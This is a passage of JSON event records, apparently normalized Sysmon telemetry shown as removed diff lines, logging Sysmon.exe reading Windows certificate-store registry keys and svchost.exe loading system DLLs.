"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "vsstrace.dll", - "image_path": "C:\\Windows\\System32\\vsstrace.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", 
- "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 
Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"image_load", - "image_name": "samlib.dll", - "image_path": "C:\\Windows\\System32\\samlib.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903090000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 